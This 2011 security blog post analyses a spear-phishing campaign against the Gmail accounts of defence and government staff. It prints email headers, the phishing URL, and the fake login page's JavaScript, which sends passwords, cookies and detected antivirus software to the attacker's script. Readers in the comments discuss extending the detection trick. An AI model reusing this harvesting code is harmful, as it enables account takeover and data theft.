Pages

Thursday, February 17, 2011

Targeted attacks against personal accounts of military, government employees and associates


See this update: Aug 11 Targeted attacks against personal Gmail accounts Part II - CNAS Report

  General threat Information

The spear phishing method used in this attack is far from being new or sophisticated. However, I am posting the following information due to the particularly invasive approach of the attack. Google, Yahoo, and other personal mail services do not offer the same protection against spoofing and malware as enterprise accounts. In addition, it is often being checked at home in a relaxed atmosphere, which helps to catch the victim off guard, especially if it appears to arrive from a frequent contact. Some people have a habit of forwarding messages from enterprise accounts to their personal mail for saving or easy reading at home, which may potentially offer some sensitive information.

 

File  - ServiceLoginAuthen.htm (not malware, file from a phishing site)
from visiting hxxp://google-mail.dyndns.org/accounts/ServiceLoginservice=mail&passive=true&rm=false&continue=bsv=1grm8snv3&ss=1&scc=1&ltmpl=default&ltmplcache=2/ServiceLoginAuth.php?u=VictimGmailID

Domain: 
google-mail.dyndns.or
g in this example but there are many others in use

Type 
View Download
link in Gmail masquerading as a link to view or download an attachment. The message comes without any attachments.

Distribution: 
Email link, targeted phishing message sent to Gmail account of a person associated with military or political affairs. Links are customized and individualized for each target.

Target recipients:
Government and non government employees working on questions of defense, political affairs, national security, defense/military personnel,  etc

Attack approach:
Victims get a message from an address of a close associate or a collaborating organization/agency, which is spoofed. The message is crafted to appear like it has an attachment with links like View Download and a name of the supposed attachment. The link leads to a fake Gmail login page for harvesting credentials.

Once the attackers gets the credentials, they login to the victims gmail account and may do the following

  • Create rules to forward all incoming mail to another account. The third party account ID is made to closely resemble the victims ID
  • Read mail and gather information about the closest associates and family/friends, especially about  frequent correspondents.
  • Use the harvested information for making future mailings more plausible. Some messages are empty while others may have references to family members and friends (e.g. mention names of spouses or refer to recent meetings) and plausible enough to generate responses or conversations from victims. We are not posting those examples due to personal nature.
  • Send such emails on monthly or biweekly basis . The messages are different like you see below but all have have the same link and designed for updating the victim credential information they already have.

 

Download



Post Updates

Update June 5, 2011
There here has been a lot of speculation over the past few days on how much sensitive data a hacker can find on personal email accounts, considering it is against the rules in most places to use personal accounts for work  Although there are strict rules for classified messages and documents, the intruders are often satisfied with just sensitive or just informational messages for building the picture they need. While I don't know how strict the rules are at the White House, the following behavior is common for at least some US Government offices and for many companies. This information is from my own knowledge, as well as accounts of people working for the US Government, military, as well as Fortune 500 companies, non-government research institutions, and other places.

click to enlarge
I am sure you will find none of these scenarios surprising, they all are very common.

Original Messages



Fw:Draft US-China Joint Statement is from dorsetttr1@state.gov, which is a non-existent account and spoofed domain. Others that are edited are real but spoofed.






The phishing link information

The link in email messages is always the same like below and redirects the victim to a fake Gmail login page, the credentials get harvested before the victim gets redirected to his mailbox.
LINK
hxxp://google-mail.dyndns.org/accounts/ServiceLoginservice=mail&passive=true&rm=false&continue=bsv=1grm8snv3&ss=1&scc=1&ltmpl=default&ltmplcache=2/ServiceLoginAuth.php?u=VictimGmailID

Message source showing the way link is created:( -replace -- with brackets '< >')

    Joint Statement - U S draft_KC edits.doc
51k  

View
--http://google-mail.dyndns.org/accounts/ServiceLoginservice=mail&passive
=true&rm=false&continue=bsv=1eic6yu9oa4y3&ss=1&scc=1&lpmpl=default&lpmpl
cache=2/ServiceLoginAuth.php?u=JDoe--   

Download
--http://google-mail.dyndns.org/accounts/ServiceLoginservice=mail&passive
=true&rm=false&continue=bsv=1eic6yu9oa4y3&ss=1&scc=1&lpmpl=default&lpmpl
cache=2/ServiceLoginAuth.php?u=JDoe--   
 


Joint Statement - U S draft_KC edits.doc 51k View Download

 

Spot the Difference:
Fake Gmail HTM page retrieved from the victim's IE Temporary Internet files compared to a real page. Both are from February 2011.

                  

Message Headers and Senders

Example 1 
Photo  08 Feb 2011 from spoofed XXXXXXX@osd.mil
113.28.117.4 - Hong Kong
Hostname:113-28-117-4.static.imsbiz.com
ISP:PCCW Business Internet Access
113.28.117.4                    
Delivered-To: XXXXXXXXXXXXXXX@gmail.com
Received: by 10.42.3.213 with SMTP id 21cs47657icp;
        Tue, 8 Feb 2011 XXXXXXXX -0800 (PST)
Received: by 10.150.133.10 with SMTP id g10mr16605259ybd.222.1297159809371;
        Tue, 08 Feb 2011 XXXXXXX -0800 (PST)
Return-Path:
Received: from ccccc-ddddd ([113.28.117.4])
        by mx.google.com with ESMTP id p37si820330ybk.35.2011.02.08.02.10.07;
        Tue, 08 Feb 2011 XXXXXXXXXX -0800 (PST)
Received-SPF: softfail (google.com: domain of transitioning XXXXXX@osd.mil does not designate 113.28.117.4 as permitted sender) client-ip=113.28.117.4;
Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning XXXXXXX@osd.mil does not designate 113.28.117.4 as permitted sender) smtp.mail=XXXXXXXXXX@osd.mil
Received: from mail pickup service by ccccc-ddddd with Microsoft SMTPSVC;
     Tue, 8 Feb 2011 XXXX +0800
Thread-Topic: Photo
[...]
From:
To:
Subject: Re:Photo
Date: Tue, 8 Feb 2011 XXXXXXXXXX +0800
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="----=_NextPart_000_0005_01CBC7BA.FEC4B5A0"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
X-OriginalArrivalTime: 08 Feb 2011 xxxxx.0437 (UTC) FILETIME=[F0C06F50:01CBC777]


This is a multi-part message in MIME format.


------=_NextPart_000_0005_01CBC7BA.FEC4B5A0
Content-Type: text/plain;
    charset="UTF-8"
Content-Transfer-Encoding: 7bit


 photo.jpg
143k  View   Download
Example 2 
Draft US-China Joint Statement 5 Jan 2011 from spoofed XXXXXXX@state.gov
113.28.117.3 - Hong Kong
Hostname:113-28-117-3.static.imsbiz.com
ISP:PCCW Business Internet Access
113.28.117.3
 Delivered-To: XXXXXXXXXXXXX@gmail.com
Received: by 10.236.111.46 with SMTP id v34cs581528yhg;
Wed, 5 Jan 2011 XXXXXXXXXX -0800 (PST)
Received: by 10.142.11.2 with SMTP id 2mr253515wfk.275.1294232332935;
Wed, 05 Jan 2011 XXXXXXXXXX -0800 (PST)
Return-Path:
Received: from ccccc-ddddd ([113.28.117.3])
by mx.google.com with ESMTP id p7si32937473wfl.41.2011.01.05.04.58.51;
Wed, 05 Jan 2011 XXXX -0800 (PST)
Received-SPF: neutral (google.com: 113.28.117.3 is neither permitted nor denied by best guess record for domain of XXXXXXX@state.gov) client-ip=113.28.117.3;
Authentication-Results: mx.google.com; spf=neutral (google.com: 113.28.117.3 is neither permitted nor denied by best guess record for domain of XXXXXXX@state.gov) smtp.mail=XXXXXXX@state.gov
Received: from mail pickup service by ccccc-ddddd with Microsoft SMTPSVC;
Wed, 5 Jan 2011 XXXXX +0800
Thread-Topic: Draft US-China Joint Statement
thread-index:
[...]

From: "XXXXX"
To:
Subject: Fw:Draft US-China Joint Statement
Date: Wed, 5 Jan 2011 xxxxx +0800
Message-ID:
[...]@cccccddddd>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0019_01CBAD1A.FB406F10"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
X-OriginalArrivalTime: 05 Jan 2011 XXX  (UTC) FILETIME=[ED3C28C0:01CBACD7]
This is a multi-part message in MIME format.
------=_NextPart_000_0019_01CBAD1A.FB406F10
Content-Type: text/plain;
charset="UTF-8"
Content-Transfer-Encoding: 7bit
This is the latest version of State's joint statement. My understanding
is that State put in placeholder econ language and am happy to have us
fill in but in their rush to get a cleared version from the WH, they
sent the attached to Mike.
_____
Joint Statement - U S draft_KC edits.doc
51k View Download 


Example 3
FW:your photo  6 Dec 2010 from spoofed XXXXXXX@state.gov

115.160.146.163 :Hong Kong
Hostname: 115.160.146.163
ISP:Wharf T T Limited

115.160.146.163
Delivered-To: XXXXXXXXXX@gmail.com
Received: by 10.236.110.18 with SMTP id t18cs81478yhg;
Mon, 6 Dec 2010 xxxxxxxxxx -0800 (PST)
Received: by 10.143.31.8 with SMTP id i8mr5120323wfj.130.1291642571767;
Mon, 06 Dec 2010 xxxxx -0800 (PST)
Return-Path: Received: from ccccc-ddddd ([115.160.146.163]) by mx.google.com with ESMTP id f18si11469743wfo.19.2010.12.06.05.36.08;
Mon, 06 Dec 2010 xxxxxxxx -0800 (PST)
Received-SPF: neutral (google.com: 115.160.146.163 is neither permitted nor denied by best guess record for domain of XXXXXXXXXX@state.gov)
client-ip=115.160.146.163;
Authentication-Results: mx.google.com; spf=neutral (google.com: 115.160.146.163 is neither permitted nor denied by best guess record for domain of XXXXXXXXXX@state.gov) smtp.mail=XXXXXXXXXX@state.gov Received: from mail pickup service by ccccc-ddddd with Microsoft SMTPSVC;
Mon, 6 Dec 2010 21:33:50 +0800
Thread-Topic: your photo thread-index: AcuVSjejtXrbQ0NlTQOGkQWqjuJP7g==
From: "SP_SpeechWriters"
To:
Subject: FW:your photo
Date: Mon, 6 Dec 2010 xx +0800
Message-ID: <[...]@cccccddddd>

MIME-Version: 1.0 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0136_01CB958D.45C66B70"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message Importance: normal
Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
X-OriginalArrivalTime: 06 Dec 2010 xxxxxxxxxx.0578 (UTC) FILETIME=[37C22520:01CB954A] This is a multi-part message in MIME format. ------=_NextPart_000_0136_01CB958D.45C66B70 Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 7bit _____ photo.jpg 98k View Download ------

Example 4
China question.docx 29 Nov 2010 from spoofed XXXXXXX@state.gov
115.160.146.163 :Hong Kong
Hostname:115.160.146.163
ISP:Wharf T T Limited
115.160.146.163
Delivered-To: XXXXXXX@gmail.com
Received: by 10.236.110.18 with SMTP id t18cs169758yhg;
Mon, 29 Nov 2010 XXXXXXXXXX -0800 (PST)
Received: by 10.150.189.19 with SMTP id m19mr10214106ybf.347.1291037598532;
Mon, 29 Nov 2010 XXXXXX -0800 (PST)
Return-Path:
Received: from ccccc-ddddd ([115.160.146.163])
by mx.google.com with ESMTP id u38si13271207yhg.58.2010.11.29.05.33.17;
Mon, 29 Nov 2010 XXXXXX -0800 (PST)
Received-SPF: neutral (google.com: 115.160.146.163 is neither permitted nor denied by best guess record for domain of XXXXXXDRl@state.gov) client-ip=115.160.146.163;
Authentication-Results: mx.google.com; spf=neutral (google.com: 115.160.146.163 is neither permitted nor denied by best guess record for domain of XXXXXXDRl@state.gov) smtp.mail=XXXXXXXXDRl@state.gov
Received: from mail pickup service by ccccc-ddddd with Microsoft SMTPSVC;
Mon, 29 Nov 2010 XXXXXXX +0800
Thread-Topic: re:Introduction/China question
thread-index:
[...]==
From:
To:
Subject: Fw:re:Introduction/China question
Date: Mon, 29 Nov 2010 XXXXXXX +0800
Message-ID: &
[...]@cccccddddd>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_008C_01CB900C.B8A772A0"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
X-OriginalArrivalTime: 29 Nov 2010 XXXXXXXX.0421 (UTC) FILETIME=[AAA32C50:01CB8FC9]
This is a multi-part message in MIME format.
------=_NextPart_000_008C_01CB900C.B8A772A0
Content-Type: text/plain;
charset="UTF-8"
Content-Transfer-Encoding: 7bit
_____
China question.docx
65k View  Download 


Example 5  
Re:your photo flash10f@163.com 26 Oct 2010 from spoofed XXXXXXX@osd.mil
61.106.26.226  Korea, Republic of
Hostname:61.106.26.226
ISP:KRNIC
61.106.26.226
 Delivered-To: XXXXXXXXXXXX@gmail.com
Received: by 10.142.47.2 with SMTP id u2cs76382wfu;
Tue, 26 Oct 2010 xxxxxxxxxx -0700 (PDT)
Received: by 10.150.11.16 with SMTP id 16mr15662399ybk.299.1288099808072;
Tue, 26 Oct 2010 xxxxxxxxxxxx -0700 (PDT)
Return-Path:
Received: from m50-134.163.com (m50-134.163.com [123.125.50.134])
by mx.google.com with ESMTP id m12si17398724anm.194.2010.10.26.06.30.05;
Tue, 26 Oct 2010 xxxxxxxxx -0700 (PDT)
Received-SPF: pass (google.com: domain of flash10f@163.com designates 123.125.50.134 as permitted sender) client-ip=123.125.50.134;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of flash10f@163.com designates 123.125.50.134 as permitted sender) smtp.mail=flash10f@163.com
Received: from smtp.163.com (unknown [61.106.26.226])
by smtp4 (Coremail) with SMTP id DtGowLALtgbU18ZM301AAA--.1642S2;
Tue, 26 Oct 2010 xxxxxxxxxxxxx +0800 (CST)
From:XXXXXXXXXXXXXXXXXXX@osd.mil
To:
Subject:Re:your photo
MIME_Version:1.0
Content-type:multipart/mixed;Boundary=www.google.com
X-CM-TRANSID:DtGowLALtgbU18ZM301AAA--.1642S2
X-Coremail-Antispam: 1Uf129KBjDUn29KB7ZKAUJUUUUU529EdanIXcx71UUUUU7v73
VFW2AGmfu7bjvjm3AaLaJ3UbIYCTnIWIevJa73UjIFyTuYvjxUxrcTUUUUU
Message-Id: [...]@m50-134.163.com ;
Date: Tue, 26 Oct 2010 xxxxxxxxxxxxxx8 +0800 (CST)
Sender: flash10f@163.com
X-CM-SenderInfo: piod2xurqiqiywtou0bp/1tbiUBJ2r0iZXvyxxgAAsf
--www.google.com
Content-type:text/html;Charset=gb2312
Content-Transfer-Encoding:base64
link is  the same as in the other emails just Base 64 encoded
--www.google.com--

Example 6 
FW:US china jeffreybader1965@163.com 1 Oct 2010 from spoofed XXXXXXX@state.gov
61.106.26.226  Korea, Republic of
Hostname:61.106.26.226
ISP:KRNIC
61.106.26.226
Delivered-To: XXXXXXXXXXXXX@gmail.com
Received: by 10.229.52.12 with SMTP id f12cs25072qcg;
Fri, 1 Oct 2010 XXXXXXXX -0700 (PDT)
Received: by 10.151.109.21 with SMTP id l21mr270881ybm.361.1285921131529;
Fri, 01 Oct 2010 XXXXXXXXXXXX -0700 (PDT)
Return-Path:
Received: from m50-133.163.com (m50-133.163.com [123.125.50.133])
by mx.google.com with ESMTP id k7si550020vcg.104.2010.10.01.01.18.50;
Fri, 01 Oct 2010 01:18:51 -0700 (PDT)
Received-SPF: pass (google.com: domain of jeffreybader1965@163.com designates 123.125.50.133 as permitted sender) client-ip=123.125.50.133;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of jeffreybader1965@163.com designates 123.125.50.133 as permitted sender) smtp.mail=jeffreybader1965@163.com
Received: from smtp.163.com (unknown [61.106.26.226])
by smtp3 (Coremail) with SMTP id [...]--.15411S2;
Fri, 01 Oct 2010 16:18:54 +0800 (CST)
From:XXXXXXXXXXXX@state.gov
To:
Subject:FW:US china
MIME_Version:1.0
Content-type:multipart/mixed;Boundary=www.google.com
X-CM-TRANSID:DdGowKDbf15rmaVMZJPQAg--.15411S2
X-Coremail-Antispam: 1Uf129KBjDUn29KB7ZKAUJUUUUU529EdanIXcx71UUUUU7v73
VFW2AGmfu7bjvjm3AaLaJ3UbIYCTnIWIevJa73UjIFyTuYvjxUDeWlDUUUU
Message-Id: [...]@m50-133.163.com>
Date: Fri, 1 Oct 2010 16:18:54 +0800 (CST)
Sender: jeffreybader1965@163.com
X-CM-SenderInfo: hmhiw2ph1etvlhurmlqv6rljoofrz/1tbiFgtd7D-6WM2FcQAAsI
--www.google.com
Content-type:text/html;Charset=gb2312
Content-Transfer-Encoding:base64
link is  the same as in the other emails just Base 64 encoded
--www.google.com--

Example 6  
Re:Fw:your photo  flash10f@163.com 03 Jul 2010 from spoofed XXXXXXX@dia.mil
69.147.251.108
Hostname:    69.147.251.108.rdns.ubiquityservers.com
ISP:    Nobis Technology Group, LLC
Organization:    Ubiquity Server Solutions New York
Country:    United States
City:    New York
69.147.251.108
[...]
Return-Path: Received: from m50-132.163.com (m50-132.163.com [123.125.50.132])
by mx.google.com with ESMTP id t18si3187622wfc.23.2010.07.03.01.08.55;
Sat, 03 Jul 2010 XXXXXXXXX6 -0700 (PDT)
Received-SPF: pass (google.com: domain of flash10f@163.com designates 123.125.50.132 as permitted sender) client-ip=123.125.50.132;
 Authentication-Results: mx.google.com; spf=pass (google.com: domain of flash10f@163.com designates 123.125.50.132 as permitted sender) smtp.mail=flash10f@163.com
Received: from smtp.163.com (unknown [69.147.251.108]) by smtp2 (Coremail) with SMTP id DNGowKCbbAQU8C5MZXqdAA--.16009S2;
Sat, 03 Jul 2010 xxxxxxxxxxx +0800 (CST)
From:XXXXXXXXXXX
To: Subject:Re:Fw:your photo
MIME_Version:1.0 Content-type:multipart/mixed;Boundary=www.google.com X-CM-TRANSID:DNGowKCbbAQU8C5MZXqdAA--.16009S2
X-Coremail-Antispam: 1Uf129KBjDUn29KB7ZKAUJUUUUU529EdanIXcx71UUUUU7v73 VFW2AGmfu7bjvjm3AaLaJ3UbIYCTnIWIevJa73UjIFyTuYvjxU5DGOUUUUU
Message-Id: [...]@m50-132.163.com>
Date: Sat, 3 Jul 2010 XXX +0800 (CST)
Sender: flash10f@163.com X
-CM-SenderInfo: piod2xurqiqiywtou0bp/1tbisRUDr0ojfgnN1AAAsP

--www.google.com Content-type:text/html;Charset=gb2312 Content-Transfer-Encoding:base64
Same link as other messages but in base 64
= --www.google.com--

Example 7
Jun 2010  fla
sh10f@163.com from XXXXXXXXXXXX@state.gov

Hostname:    218.56.241.32
ISP:    China Unicom Shandong province network
Organization:    China Unicom Shandong province network
Country:    China
State/Region:    Shandong
City:    Jinan

218.56.241.32
 Delivered-To: XXXXXXX@gmail.com
Received: by 10.229.233.65 with SMTP id jx1cs329551qcb;
Wed, XX Jun 2010 xxx -0700 (PDT)
Received: by 10.142.121.15 with SMTP id t15mr6154179wfc.315.1275548330641;
Wed, 0XX Jun 2010 xxxxx -0700 (PDT)
Return-Path:
Received: from m50-135.163.com (m50-135.163.com [123.125.50.135])
by mx.google.com with ESMTP id 1si2008201pzk.78.2010.06.02.23.58.49;
Wed, 0XX Jun 2010 23:58:50 -0700 (PDT)
Received-SPF: pass (google.com: domain of flash10f@163.com designates 123.125.50.135 as permitted sender) client-ip=123.125.50.135;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of flash10f@163.com designates 123.125.50.135 as permitted sender) smtp.mail=flash10f@163.com
Received: from smtp.163.com (unknown [218.56.241.32])
by smtp5 (Coremail) with SMTP id D9GowLBLkAalUgdMScmMAA--.42653S2;
Thu, 03 Jun 2010 14:58:45 +0800 (CST)
From:XXXXXXXXXXXX@state.gov
To:
Subject:Re:xxxxxxxxxxxx  xxxxx  xxxxxx xxxxxxxxxxx
MIME_Version:1.0
Content-type:multipart/mixed;Boundary=www.google.com
X-CM-TRANSID:D9GowLBLkAalUgdMScmMAA--.42653S2
X-Coremail-Antispam: 1Uf129KBjDUn29KB7ZKAUJUUUUU529EdanIXcx71UUUUU7v73
VFW2AGmfu7bjvjm3AaLaJ3UbIYCTnIWIevJa73UjIFyTuYvjxUx9YwUUUUU
Message-Id: <[...]@m50-135.163.com>
Date: Thu, XX Jun 2010 XXXXXXXXXX +0800 (CST)
Sender: flash10f@163.com
X-CM-SenderInfo: piod2xurqiqiywtou0bp/1tbiKw3kr0jfSUQ0AAAAsD
--www.google.com
Content-type:text/html;Charset=gb2312
Content-Transfer-Encoding:base64

Example 8 
Re:2010_Security rationale for reducing NWs 30 May 2010  flash10f@163.com from spoofed victimID
218.56.239.206
Hostname:    218.56.239.206
ISP:    China Unicom Shandong province network
Organization:    China Unicom Shandong province network
Country:    China
State/Region:    Shandong
City:    Jinan
218.56.239.206
Delivered-To: XXXXXXXXXXXX@gmail.com
Received: by 10.229.233.65 with SMTP id jx1cs157738qcb;
Sun, 30 May 2010 XXXX -0700 (PDT)
Received: by 10.143.84.6 with SMTP id m6mr2507411wfl.8.1275269851471;
Sun, 30 May 2010 XXXX -0700 (PDT)
Return-Path:
Received: from m50-133.163.com (m50-133.163.com [123.125.50.133])
by mx.google.com with ESMTP id xxxxxxxxxxx.7.2010.05.30.18.37.29;
Sun, 30 May 2010 XXXX -0700 (PDT)
Received-SPF: pass (google.com: domain of flash10f@163.com designates 123.125.50.133 as permitted sender) client-ip=123.125.50.133;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of flash10f@163.com designates 123.125.50.133 as permitted sender) smtp.mail=flash10f@163.com
Received: from smtp.163.com (unknown [218.56.239.206])
by smtp3 (Coremail) with SMTP id DdGowKA7+QXXEgNMC8VXAA--.28789S2;
Mon, 31 May 2010 09:37:27 +0800 (CST)
From           XXXXXXX
To:
Subject:Re:2010_Security rationale for reducing NWs
MIME_Version:1.0
Content-type:multipart/mixed;Boundary=www.google.com
X-CM-TRANSID:DdGowKA7+QXXEgNMC8VXAA--.28789S2
X-Coremail-Antispam: 1Uf129KBjDUn29KB7ZKAUJUUUUU529EdanIXcx71UUUUU7v73
VFW2AGmfu7bjvjm3AaLaJ3UbIYCTnIWIevJa73UjIFyTuYvjxU3dcTUUUUU
Message-Id: <[...]@m50-133.163.com>
Date: Mon, 31 May 2010 XXXXXXXXXXXX +0800 (CST)
Sender: flash10f@163.com
X-CM-SenderInfo: piod2xurqiqiywtou0bp/1tbixhjhr0saWVOGlwAAsa




Analysis

LoginServiceAuthen.htm
(note that Gmail real page is usually named LoginServiceAuth.htm) 


Submission of credentials in clear text on the fake login page and redirect to Gmail.
Checks for the password length and it if is less than 6 characters, displays 'Enter your password' pop up, otherwise accepts ANY password and redirects the victim further to Google.
"xss2.php?login=JDoe@gmail.com&passwd="

 function gaia_onLoginSubmit() {
  
 if (document.getElementById("Passwd").value.length<6 )
  {alert('Enter your password');
  document.getElementById("Passwd").value="";
  document.getElementById("Passwd").focus();
  return false;
  }
  new Image().src="xss2.php?login=JDoe@gmail.com&passwd="+document.getElementById("Passwd").value;
setTimeout(function(){top.location.href="http://www.google.com/seget?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=gaia_onloginsubmit"},200);
  return false;
}

Checking for installed software (type of antivirus, browser, flash, and cookie config) remotely, this part of the script is borrowed from the Chinese-made so called  xKungfoo script- can be found in many places on internet
# //Name: img标签远程域检测本地域软件是否存在poc  
# / / Name: img tag remote field testing for the existence of the local software poc
# //Description: IE浏览器都有效 
# / / Description: IE browser are valid
# //Author: Knownsec Team 
# //Date: 2008-11-03 / / Date: 2008-11-03

(function(){
knownImg = {}
knownImg.resList = [ 
{id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir%20PersonalEdition%20Classic\\setup.dll/2/132'},
{id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir Desktop\\setup.dll/2/132'},
{id: 'Avast4', res: 'res://C:\\Program%20Files\\Alwil%20Software\\Avast4\\ashAvast.exe/2/267'},
{id: 'Rising', res: 'res://C:\\Program%20Files\\Rising\\Ris\\SetUp.exe/2/147'},
{id: 'JiangMin', res: 'res://C:\\Program%20Files\\JiangMin\\Install\\KVOL.exe/2/202'},
{id: 'ALYac', res: 'res://C:\\Program%20Files\\ESTsoft\\ALYac\\AYUpdate.aye/2/30994'},
{id: 'ZoneAlarm', res: 'res://C:\\Program%20Files\\Zone%20Labs\\ZoneAlarm\\alert.zap/2/176'},
{id: 'NOD32 Smart Security', res: 'res://C:\\Program%20Files\\ESET\\ESET%20Smart%20Security\\eguiEpfw.dll/2/1070'},
{id: 'McAfee Enterprise', res: 'res://C:\\Program%20Files\\McAfee\\VirusScan Enterprise\\graphics.dll/2/202'},
{id: 'McAfee Security Center', res: 'res://C:\\Program%20Files\\McAfee\\MSC\\mclgview.exe/2/129'},
{id: 'Kaspersky Anti-Virus 2010', res: 'res://C:\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Anti-Virus%202010\\shellex.dll/2/103'},
{id: 'Kaspersky Internet Security 2010', res: 'res://C:\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%202010\\shellex.dll/2/103'},
{id: 'Kaspersky Internet Security 2009', res: 'res://C:\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%202009\\oeas.dll/2/206'},
{id: 'Kaspersky Anti-Virus 2009', res: 'res://C:\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Anti-Virus%202009\\oeas.dll/2/206'},
{id: 'Symantec Endpoint Protection', res: 'res://C:\\Program%20Files\\Symantec\\LiveUpdate\\AUPDATE.exe/2/129'},
{id: 'Norton Internet Security 16.0.0.125', res: 'res://C:\\Program%20Files\\Norton%20Internet%20Security\\Engine\\16.0.0.125\\SymSHAx9.dll/2/102'},
{id: 'Norton Internet Security 16.5.0.135', res: 'res://C:\\Program%20Files\\Norton%20Internet%20Security\\Engine\\16.5.0.135\\SymSHAx9.dll/2/102'},
{id: 'Norton AntiVirus 17.5.0.127', res: 'res://C:\\Program%20Files\\Norton%20AntiVirus\\MUI\\17.5.0.127\\images\\cssbase.dll/2/SCANTASKWZ_SCAN_ITEM_LIST.BMP'},
{id: '360 Safe', res: 'res://C:\\Program%20Files\\360\\360safe\\360Safe.exe/2/131'},
{id: 'Trend Micro Internet Security', res: 'res://C:\\Program%20Files\\Trend%20Micro\\Internet%20Security\\UfSeAgnt.exe/2/30994'},
{id: 'Trend Micro OfficeScan Client', res: 'res://C:\\Program%20Files\\Trend%20Micro\\OfficeScan%20Client\\PcNTMon.exe/2/30994'},
{id: 'AhnLab', res: 'res://C:\\Program%20Files\\AhnLab\\Smart%20Update%20Utility\\SUpdate.exe/2/153'},
{id: 'V3 Lite', res: 'res://C:\\Program%20Files\\AhnLab\\V3Lite\\V3LTray.exe/2/132'},
{id: 'QuickTime', res: 'res://C:\\Program%20Files\\QuickTime\\QTinfo.exe/2/101'},
{id: 'QQ-XuanFeng', res: 'res://C:\\Program%20Files\\Tencent\\QQDownload\\QQDownload.exe/2/132'}
];
knownImg.ok_resList = new Array();
knownImg.tmp_resList = new Array();
knownImg.checkSoft = function(){
if (document.all){
x = new Array();
for (i = 0; i < knownImg.resList.length; i++){
x[i] = new Image();
x[i].src = "";
knownImg.ok_resList.push(knownImg.resList[i].id);
x[i].onload = function(){
//alert(knownImg.resList[i].id + ': return true');
}
x[i].onerror = function(){
//alert(knownImg.resList[i].id + ': return false');
knownImg.ok_resList.pop();
}
x[i].src = knownImg.resList[i].res;
}
}
}
knownImg.checkSoft();


var isIE  = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
var v1;
var srcstr;

if (navigator.plugins != null && navigator.plugins.length > 0) {
  if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
   var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
   var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
   var descArray = flashDescription.split(" ");
   var tempArrayMajor = descArray[2].split(".");   
   v1 = tempArrayMajor[0];
  }else{v1='uninstalled';}
srcstr='&cid='+escape(top.document.cookie)+'&cbv='+escape(navigator.userAgent)+'&fpv='+escape(flashDescription);
 }else if ( isIE && isWin && !isOpera ) {
try{
        var swf = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
        var sversion=swf.GetVariable("$version");
        v1=parseInt(sversion.split(" ")[1].split(",")[0]);
        }
        catch(e){v1='uninstalled';}
srcstr='&cid='+escape(document.cookie)+'&cbv='+escape(navigator.appMinorVersion)+'&cul='+escape(navigator.userLanguage)+'&fpv='+escape(sversion)+'&soft='+escape(knownImg.ok_resList);
}
if(document.cookie.indexOf("gradosr80")==-1){
document.cookie="gradosr80";
setTimeout(function(){
var _img = document.createElement("img");
_img.style.display = "none";
_img.src="xss2.php?act=check&account=JDoe@gmail.com&fid="+v1+srcstr;
document.body.appendChild(_img);},0);}

Hardcoded victim's Gmail ID (changed to JDoe by me)

   
-input type="hidden" name="dsh" id="dsh"
           value="6727937193710978661" />
-input type="hidden" name="hl" id="hl"
           value="en" />
-input type="hidden"
             name="GALX"
-input type="text" name="Email"  id="Email"
  size="18" value="JDoe"

Setting persistent cookie to keep the victim logged in for easier redirects

  
  
 -input checked="checked" id="PersistentCookie" name="PersistentCookie" type="checkbox" value="yes" />

10 comments:

  1. Hi Mila,

    res protocol has been disabled for Internet Zone since IE6 SP1. Do you know how to achieve the same without res and without malicious zone escalation on the client site please?

    Thanks,

    [!v@n]

    ReplyDelete
  2. Right, it works on IE6 only. I don't read Chinese but sounds like they may have a POC for IE7/8 - not sure. http://www.hackline.net/a/school/bdzs/fmuma/2010/0602/4175.html

    ReplyDelete
  3. It looks it is not working. Never mind. If I find a working version I will let you know.

    Thanks,

    [!v@n]

    ReplyDelete
  4. So, how do the photo attachments lead to a problem? Or is the photo not valid so it might get opened up with something that can read more than just images?

    ReplyDelete
  5. This gives too much emphasis on insignificant visual clues that the attacker can easily resolve. Unless your trying to embarrass the attackers with their shoddy work.

    An attacker could easily create a perfect and upto date visual clone with correct page name and links. The only significant information here for end users is that the domain name is wrong and ssl is not used and they could even of done a better job of that. Perhaps using a phishing address such as goog1e.com and enabling ssl.

    The best advice for high profile targets, is to understand howto verify the site certificate is the correct one for google. The browsers could do more here.

    I'm also very found of the two stage authentication mechanism from Google, that makes this type of attacker very difficult.

    - Matt
    [ Not available for designing scams :-) ]

    ReplyDelete
  6. This is incredible information about this widely reported Gmail attack. Thank you for the very informative info!

    ReplyDelete
  7. Anonymous said...

    So, how do the photo attachments lead to a problem? Or is the photo not valid so it might get opened up with something that can read more than just images?
    June 1, 2011 7:21 PM

